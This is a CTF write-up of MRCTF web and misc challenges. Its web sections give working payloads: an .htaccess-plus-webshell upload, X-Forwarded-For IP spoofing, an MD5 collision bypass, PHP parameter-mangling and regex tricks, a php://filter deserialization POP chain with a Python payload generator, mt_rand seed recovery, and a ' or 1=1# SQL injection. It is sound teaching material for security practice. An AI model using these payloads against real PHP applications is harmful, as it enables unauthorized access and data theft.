WEB
PYwebsite
A purchase page: enter the authorization code to view the flag.
The page source contains an MD5 hash.
I assumed it had to be brute-forced; after that went nowhere I looked at flag.php instead.
Spoofing a loopback client address with the X-Forwarded-For header (127.0.0.1) returned the flag.
你传你🐎呢
File-upload challenge.
Testing showed that a .htaccess file can be uploaded:

```apache
<FilesMatch "1.aaa">
    SetHandler application/x-httpd-php
</FilesMatch>
```

This makes Apache hand a file named 1.aaa to the PHP handler (the pattern is a regex, so the dot matches any character; it only takes effect if the upload directory allows .htaccess overrides, i.e. AllowOverride includes FileInfo). Upload a one-line PHP webshell as 1.aaa, connect to it, and the flag is in the web root.
ez_bypass
```php
<?php
// I put something in F12 for you
include 'flag.php';
$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
if(isset($_GET['gg'])&&isset($_GET['id'])) {
    $id=$_GET['id'];
    $gg=$_GET['gg'];
    if (md5($id) === md5($gg) && $id !== $gg) {
        echo 'You got the first step';
        if(isset($_POST['passwd'])) {
            $passwd=$_POST['passwd'];
            if (!is_numeric($passwd))
            {
                if($passwd==1234567)
                {
                    echo 'Good Job!';
                    highlight_file('flag.php');
                    die('By Retr_0');
                }
                else
                {
                    echo "can you think twice??";
                }
            }
            else{
                echo 'You can not get it !';
            }
        }
        else{
            die('only one way to get the flag');
        }
    }
    else {
        echo "You are not a real hacker!";
    }
}
else{
    die('Please input first');
}
```
MD5 bypass. Both `md5($id) === md5($gg)` and `$id !== $gg` must hold, so id and gg have to be two different strings with the same MD5 digest. A real collision pair does it; the two URL-encoded blobs below are a published 64-byte single-block MD5 collision and differ in only two bytes:
id=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
&gg=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
Then POST passwd=1234567e (the parameter is passwd, not password). The trailing letter makes is_numeric() return false, but PHP 7's loose comparison converts a leading-numeric string to its numeric prefix, so "1234567e" == 1234567 is true. On PHP 8 an int compared with a non-numeric string is compared as strings, so the same trick fails there; the challenge runs PHP 7.
That prints the flag.
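As an added check that is not part of the original writeup, the Python below verifies offline that the two blobs really are a collision that satisfies the first `if`, and models the second check to show why `1234567e` passes on PHP 7 but not PHP 8. The numeric-string model (`php_is_numeric`, `php_loose_eq_int`) is a simplified emulation written for this example, not PHP's own code.

```python
import hashlib
import re
from urllib.parse import unquote_to_bytes

# The two URL-encoded blobs from the writeup (a published 64-byte single-block MD5 collision pair).
ID = ("M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2"
      "%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2")
GG = ("M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2"
      "%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2")


def decode(blob: str) -> bytes:
    """Percent-decode the way PHP fills $_GET (NUL and high bytes survive).
    unquote_to_bytes leaves '+' alone; PHP would turn it into a space, but these blobs contain none."""
    return unquote_to_bytes(blob)


def first_step(id_raw: bytes, gg_raw: bytes) -> bool:
    """md5($id) === md5($gg) && $id !== $gg"""
    same_digest = hashlib.md5(id_raw).hexdigest() == hashlib.md5(gg_raw).hexdigest()
    return same_digest and id_raw != gg_raw


def diff_positions(a: bytes, b: bytes) -> list:
    """Byte offsets at which the two messages differ."""
    return [i for i, (x, y) in enumerate(zip(a, b)) if x != y]


# --- simplified model of PHP's numeric-string rules (written for this example, not PHP source) ---
_NUMERIC = re.compile(r'^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$')  # PHP 7: leading whitespace ok, trailing not
_LEADING = re.compile(r'^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?')


def php_is_numeric(s: str) -> bool:
    return _NUMERIC.match(s) is not None


def php_loose_eq_int(s: str, n: int, php8: bool = False) -> bool:
    """$s == $n for a string and an int."""
    if php_is_numeric(s):
        return float(s) == n
    if php8:
        return s == str(n)            # PHP 8: non-numeric string vs int is compared as strings
    m = _LEADING.match(s)             # PHP 7: the leading numeric prefix is used, anything else is 0
    return (float(m.group(0)) if m else 0) == n


def passwd_accepted(passwd: str, php8: bool = False) -> bool:
    """!is_numeric($passwd) && $passwd == 1234567"""
    return not php_is_numeric(passwd) and php_loose_eq_int(passwd, 1234567, php8)


if __name__ == "__main__":
    a, b = decode(ID), decode(GG)
    print("collision:", first_step(a, b), "differing offsets:", diff_positions(a, b))
    print("passwd=1234567e  PHP 7:", passwd_accepted("1234567e"), " PHP 8:", passwd_accepted("1234567e", php8=True))
```

The two messages differ only at offsets 35 and 55, which is why the server accepts them as "different" while their digests match.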
套娃
Open the page and view the source:

```php
<?php
$query = $_SERVER['QUERY_STRING'];

if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
    die('Y0u are So cutE!');
}
if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
    echo "you are going to the next ~";
}
```
The raw query string is checked for _ and %5f, but PHP has a quirk that gets around it: when it builds $_GET it rewrites certain characters in parameter names, turning a dot or a space into an underscore. So send the name as b.u.p.t (or b+u+p+t) and the filter never sees an underscore. The value must not be exactly 23333 yet must match /^23333$/; without the D modifier PCRE's $ also matches just before a trailing newline, so 23333%0a passes. Payload: ?b.u.p.t=23333%0a. (substr_count is case-sensitive, so an upper-case %5F would slip past the filter as well.)
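Added example (not from the original writeup): a Python model of the first-level check, with PHP's parameter-name mangling reduced to the two rewrites that matter here (dot and space become underscore; the bracket rule is omitted). It shows which query strings the filter stops and which reach, and pass, the regex.

```python
import re
from urllib.parse import unquote_plus

FILTER_MSG = 'Y0u are So cutE!'
NEXT_MSG = 'you are going to the next ~'


def raw_query_filtered(query: str) -> bool:
    """substr_count($query,'_') !== 0 || substr_count($query,'%5f') != 0, run on the *raw* query string.
    substr_count is case-sensitive, so an upper-case %5F is not caught."""
    return '_' in query or '%5f' in query


def php_get(query: str) -> dict:
    """Rebuild $_GET roughly the way PHP does: split on & and =, percent-decode ('+' is a space),
    then mangle parameter names: '.' and ' ' become '_'. Simplified model for this example."""
    params = {}
    for pair in query.split('&'):
        if not pair:
            continue
        name, _, value = pair.partition('=')
        name = unquote_plus(name).replace('.', '_').replace(' ', '_')
        params[name] = unquote_plus(value)
    return params


def level_one(query: str) -> str:
    """Return the text the first level would print for a given raw query string."""
    if raw_query_filtered(query):
        return FILTER_MSG
    v = php_get(query).get('b_u_p_t')
    # preg_match('/^23333$/'): without the D modifier, $ also matches before a final "\n";
    # Python's $ behaves the same way, so re.match models it faithfully here.
    if v is not None and v != '23333' and re.match(r'^23333$', v):
        return NEXT_MSG
    return ''


if __name__ == "__main__":
    for q in ('b_u_p_t=23333%0a', 'b.u.p.t=23333', 'b.u.p.t=23333%0a', 'b+u+p+t=23333%0a'):
        print(f'{q:22} -> {level_one(q)!r}')
```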
That leads to the next level, secrettw.php.
Its page source contains a JavaScript snippet; running it in the browser console gives the hint to POST a parameter named Merak.
Doing so returns the PHP source:

```php
<?php
error_reporting(0);
include 'takeip.php';
ini_set('open_basedir','.');
include 'flag.php';

if(isset($_POST['Merak'])){
    highlight_file(__FILE__);
    die();
}

function change($v){
    $v = base64_decode($v);
    $re = '';
    for($i=0;$i<strlen($v);$i++){
        $re .= chr ( ord ($v[$i]) + $i*2 );
    }
    return $re;
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1') echo "Sorry,you don't have permission! Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
    echo "Your REQUEST is:".change($_GET['file']);
    echo file_get_contents(change($_GET['file']));
}
```
Three things are needed: the client IP must be 127.0.0.1, file_get_contents($_GET['2333']) must return exactly the string todat is a happy day (sic), and the file parameter is transformed by change() before being read. takeip.php is not shown, so how the IP is taken is an assumption; a forged client-IP header such as X-Forwarded-For: 127.0.0.1, as in PYwebsite, is the usual way to pass that check.
change() base64-decodes its input and adds 2*i to the i-th byte, so the inverse is the same walk with minus instead of plus: subtract 2*i from each byte of the target path, then base64-encode.
For flag.php that gives ZmpdYSZmXGI=.
For the 2333 check, use the php://input wrapper, which makes file_get_contents() return the raw POST body:
GET: secrettw.php?2333=php://input&file=ZmpdYSZmXGI=
POST body (raw, exactly this, no form fields, otherwise the comparison fails): todat is a happy day
The response contains the flag.
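Added example, not the author's code: a Python port of change() together with its inverse, plus a helper that assembles the request above. It assumes only that PHP's chr() wraps modulo 256 (it does), and that the server compares the POST body against the literal string shown in the source.

```python
import base64

MAGIC = "todat is a happy day"   # the exact string the server compares the request body against


def change(v: str) -> str:
    """Port of the server's change(): base64-decode, then add 2*i to the i-th byte (chr() wraps mod 256)."""
    raw = base64.b64decode(v)
    return "".join(chr((b + 2 * i) % 256) for i, b in enumerate(raw))


def unchange(path: str) -> str:
    """Inverse of change(): subtract 2*i from the i-th byte, then base64-encode."""
    raw = bytes((ord(c) - 2 * i) % 256 for i, c in enumerate(path))
    return base64.b64encode(raw).decode()


def build_request(path: str) -> tuple:
    """(query string, raw POST body) for secrettw.php.
    php://input makes file_get_contents() return the raw body, so the body must be exactly MAGIC;
    with no key=value pairs in it, $_POST['Merak'] also stays unset and the source dump is skipped."""
    encoded = unchange(path)
    # If the base64 contained '+' it would have to be percent-encoded (PHP reads a literal '+' as a space).
    return f"2333=php://input&file={encoded}", MAGIC


if __name__ == "__main__":
    query, body = build_request("flag.php")
    print("GET  secrettw.php?" + query)
    print("POST", body)
    print("server will read:", change(unchange("flag.php")))
```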
Ezpop
The source is shown on opening; it is a deserialization challenge:

```php
<?php
class Modifier {
    protected $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source." ";
    }
    public function __toString(){
        return $this->str->source;
    }
    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }
    public function __get($key){
        $function = $this->p;
        return $function();
    }
}
```
Source review.
The goal is to read flag.php; Modifier::append() is the sink, since include() on a file path reads it.
Searching turned up a very similar challenge; this one appears to be adapted from it.
The chain, from the unserialize() entry point:
unserialize() of a Show object calls Show::__wakeup, which runs preg_match() on $this->source. If source is itself a Show object, preg_match() has to convert it to a string,
which triggers Show::__toString; it returns $this->str->source, so make str a Test object, which has no source property,
which triggers Test::__get; it calls $this->p(), so make p a Modifier object,
which triggers Modifier::__invoke, which calls append($this->var), i.e. include($this->var),
and that reads the file.
So Modifier::$var has to be flag.php.
```php
// Modifier::$var is protected, so it cannot be assigned from outside the class;
// in the local copy used to build the payload it was set to 'flag.php' inside the class.
$a = new Show();
$a->source = $a;        // source points back at the Show itself -> serialized as r:1
$b = new Test();
$a->str = $b;
$c = new Modifier();
$b->p = $c;
$a = serialize($a);
echo $a;
```
Serialized output (the \0 below mark the two NUL bytes PHP puts around * for a protected property; they are invisible when printed, which is why the payload has to be URL-encoded before sending):
O:4:"Show":2:{s:6:"source";r:1;s:3:"str";O:4:"Test":1:{s:1:"p";O:8:"Modifier":1:{s:6:"\0*\0var";s:8:"flag.php";}}}
URL-encoded:
O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Br%3A1%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D%7D
Submitting it only prints Help Me Find FLAG!: flag.php was included and executed, but it does not print the flag. So read the file's source instead of executing it, with a filter wrapper, which is a normal include() path and is not in the __wakeup blacklist (it covers gopher, http, file, ftp, https, dict and ..). Set var to:
php://filter/read=convert.base64-encode/resource=flag.php
(57 bytes, so the length field becomes s:57). include() then emits the base64 of flag.php as plain text.
URL-encoded:
O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Br%3A1%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7D
Base64-decode the output for the flag.
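Added example (not the writeup's PHP): a small Python generator for exactly this chain, so the NUL bytes of the protected property, the byte lengths and the r:1 back-reference are produced mechanically instead of by hand. It assumes nothing beyond PHP's serialize() format for objects, strings and back-references; the class and property names are the ones from the source above.

```python
from urllib.parse import quote


def php_str(s: str) -> str:
    """Serialized PHP string. The length counts bytes, not characters."""
    return f's:{len(s.encode())}:"{s}";'


def protected_prop(name: str) -> str:
    """serialize() names a protected property "\\0*\\0name" (a private one would be "\\0Class\\0name")."""
    return f"\x00*\x00{name}"


def build_pop(var: str) -> str:
    """Show(source = r:1 -> the Show itself, str = Test(p = Modifier(var = <var>)))."""
    modifier = 'O:8:"Modifier":1:{' + php_str(protected_prop("var")) + php_str(var) + '}'
    test = 'O:4:"Test":1:{' + php_str("p") + modifier + '}'
    # r:1 is a back-reference to object #1, the outer Show: preg_match() in __wakeup therefore
    # receives an object and must call __toString on it, which starts the chain.
    return 'O:4:"Show":2:{' + php_str("source") + 'r:1;' + php_str("str") + test + '}'


def url_payload(var: str) -> str:
    """Percent-encode every byte so the NULs survive the trip through the query string."""
    return quote(build_pop(var), safe='')


if __name__ == "__main__":
    print(url_payload("flag.php"))
    print(url_payload("php://filter/read=convert.base64-encode/resource=flag.php"))
```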
Ezaudit
Source leak: www.zip can be downloaded.
Source:

```php
<?php
header('Content-type:text/html; charset=utf-8');
error_reporting(0);
if(isset($_POST['login'])){
    $username = $_POST['username'];
    $password = $_POST['password'];
    $Private_key = $_POST['Private_key'];
    if (($username == '') || ($password == '') ||($Private_key == '')) {
        // an empty field counts as not filled in: show the error and return to the login page after 2 seconds
        header('refresh:2; url=login.html');
        echo "用户名、密码、密钥不能为空啦,crispr会让你在2秒后跳转到登录界面的!";
        exit;
    }
    else if($Private_key != '*************' )
    {
        header('refresh:2; url=login.html');
        echo "假密钥,咋会让你登录?crispr会让你在2秒后跳转到登录界面的!";
        exit;
    }
    else{
        if($Private_key === '************'){
            $getuser = "SELECT flag FROM user WHERE username= 'crispr' AND password = '$password'".';';
            $link=mysql_connect("localhost","root","root");
            mysql_select_db("test",$link);
            $result = mysql_query($getuser);
            while($row=mysql_fetch_assoc($result)){
                echo "".$row["username"]."".$row["flag"]."";
            }
        }
    }
}
// genarate public_key
function public_key($length = 16) {
    $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $public_key = '';
    for ( $i = 0; $i < $length; $i++ )
        $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
    return $public_key;
}
//genarate private_key
function private_key($length = 12) {
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ( $i = 0; $i < $length; $i++ )
        $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    return $private_key;
}
$Public_key = private_key();
//$Public_key = KVQP0LdJKRaV3n9D  how to get crispr's private_key???K
```
Both keys come from mt_rand(), and the public key KVQP0LdJKRaV3n9D is leaked in the comment, so this is a seed-recovery problem. Each character of the public key is the alphabet index of one mt_rand(0, 61) output (a-z are 0-25, A-Z 26-51, 0-9 52-61); feed those 16 values to php_mt_seed and it recovers the seed 1775196155. The private key is whatever the same generator produces next, so put public_key() and private_key() in one script, call mt_srand(1775196155), run public_key() first (to consume the same 16 outputs) and then private_key(); the result is crispr's private key. Two caveats: run it on the same PHP major version as the target, because mt_rand()'s output for a range changed in PHP 7.1 (php_mt_seed labels each candidate seed with the PHP version range it applies to), and the mysql_* functions in the source were removed in PHP 7.0, so the target is PHP 5.x. With the private key accepted, the password goes into the SQL string unescaped, so a universal-password injection (e.g. ' or 1=1# as the password) returns the row and the page prints the flag.
MISC
pyFlag
Three images.
Opening them in 010 Editor shows that each image has a piece of a zip archive appended after its image data; these are three parts of one archive. Concatenate the three tails in order into a single file and brute-force its password.
The password is 1234.
The extracted text is encoded in layers: base85, then base16, base32, base16 and finally base64.
Peel them in that order to get the flag.
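Added helper, not from the writeup: the five decoding layers as one Python function, with an encoder that exists only to build a constructed test vector. It assumes the base85 layer uses the alphabet Python's `base64.b85decode` expects (the git/Mercurial variant); if the text turns out to be Ascii85 (`<~ ... ~>` style) pass `ascii85=True`. `casefold=True` on the hex layers is deliberate, since tools often emit lower-case hex and `b16decode` is strict by default.

```python
import base64


def decode_chain(blob: bytes, ascii85: bool = False) -> bytes:
    """Peel the layers in the order the writeup lists them: base85 -> base16 -> base32 -> base16 -> base64."""
    data = base64.a85decode(blob) if ascii85 else base64.b85decode(blob)
    data = base64.b16decode(data, casefold=True)   # accept lower-case hex as well
    data = base64.b32decode(data)
    data = base64.b16decode(data, casefold=True)
    data = base64.b64decode(data)
    return data


def encode_chain(plain: bytes, ascii85: bool = False) -> bytes:
    """Encoder side, used here only to make a test vector: the same layers applied inside-out."""
    data = base64.b64encode(plain)
    data = base64.b16encode(data)
    data = base64.b32encode(data)
    data = base64.b16encode(data)
    return base64.a85encode(data) if ascii85 else base64.b85encode(data)


# Constructed sample input; this is not the challenge's flag.
SAMPLE = b"MRCTF{constructed_sample_not_the_real_flag}"


if __name__ == "__main__":
    layered = encode_chain(SAMPLE)
    print(layered[:60], b"...")
    print(decode_chain(layered))
```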
千层套路
Nested archives; each one's password is the archive's own file name.
For the Python script that unpacks them see Y1ng's writeup of the BJDCTF challenge TARGZ.
The innermost archive yields QR.TXT, which is nothing but RGB values, one pixel per line; a short Python script turns them back into a QR code image:

```python
# -*- coding: utf-8 -*-
from PIL import Image

x = 200  # width: factor the number of lines in the txt as x*y
y = 200  # height
im = Image.new("RGB", (x, y))  # create the image
with open('C:\\Users\\Admin\\Documents\\qr.txt') as file:  # open the RGB value file
    # rebuild the image pixel by pixel
    for i in range(0, x):
        for j in range(0, y):
            line = file.readline()  # one line = one pixel
            rgb = line.split(",")  # split into r, g, b
            im.putpixel((i, j), (int(rgb[0]), int(rgb[1]), int(rgb[2])))  # write the pixel
im.show()
```

Scan it for the flag.
Unravel!!
Opening it gives an archive, an audio file and an image.
The audio file's name hints to look at the end of the file.
WinHex shows a base64 string there:
U2FsdGVkX1/nSQN+hoHL8OwV9iJB/mSdKk5dmusulz4=
(The prefix U2FsdGVkX1 decodes to Salted__, the header of OpenSSL/CryptoJS password-based encryption: 8 bytes of salt follow it, then the ciphertext.)
Separating the image yields a second image named AES containing the text Tokyo;
so decrypt the string as AES with Tokyo as the passphrase.
That gives the archive password: CCGandGulu
Extract Ending.wav
and run it through SilentEye
to get the flag.
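Added example (the writeup used a GUI tool for this step): Python that parses the Salted__ container, derives key and IV with OpenSSL's EVP_BytesToKey (MD5, one round, AES-256 parameters, which is also what CryptoJS uses for a passphrase), and decrypts if the `cryptography` package is installed. It assumes the ciphertext is CryptoJS/OpenSSL-compatible password-based AES-256-CBC with PKCS#7 padding, which is what the header indicates; the salt and ciphertext lengths are checked against the string from the writeup.

```python
import base64
import hashlib

# The base64 string found at the end of the audio file (from the writeup above).
BLOB = "U2FsdGVkX1/nSQN+hoHL8OwV9iJB/mSdKk5dmusulz4="


def parse_openssl_salted(b64: str) -> tuple:
    """Split an OpenSSL/CryptoJS 'Salted__' container into (salt, ciphertext)."""
    raw = base64.b64decode(b64)
    if raw[:8] != b"Salted__":
        raise ValueError("not a Salted__ container")
    return raw[8:16], raw[16:]


def evp_bytes_to_key(passphrase: bytes, salt: bytes, key_len: int = 32, iv_len: int = 16) -> tuple:
    """EVP_BytesToKey with MD5 and one iteration (openssl enc -md md5 / CryptoJS.AES.encrypt(msg, passphrase)):
    D_1 = MD5(pass||salt), D_n = MD5(D_{n-1}||pass||salt); key = first key_len bytes of D_1||D_2||...,
    IV = the iv_len bytes after that."""
    material, block = b"", b""
    while len(material) < key_len + iv_len:
        block = hashlib.md5(block + passphrase + salt).digest()
        material += block
    return material[:key_len], material[key_len:key_len + iv_len]


def decrypt_salted(b64: str, passphrase: str):
    """AES-256-CBC + PKCS#7 decryption of the container. AES is not in the standard library,
    so this returns None when the 'cryptography' package is missing."""
    salt, ct = parse_openssl_salted(b64)
    key, iv = evp_bytes_to_key(passphrase.encode(), salt)
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    except ImportError:
        return None
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = dec.update(ct) + dec.finalize()
    pad = padded[-1]
    if not 1 <= pad <= 16 or padded[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding: wrong passphrase or parameters")
    return padded[:-pad].decode(errors="replace")


if __name__ == "__main__":
    salt, ct = parse_openssl_salted(BLOB)
    print("salt:", salt.hex(), "ciphertext bytes:", len(ct))
    print("plaintext:", decrypt_salted(BLOB, "Tokyo"))
```

The single 16-byte ciphertext block is consistent with a short password padded to one AES block. A wrong passphrase normally surfaces as a padding error rather than garbage, so the check at the end is the cheap way to tell a wrong guess from a decoding problem.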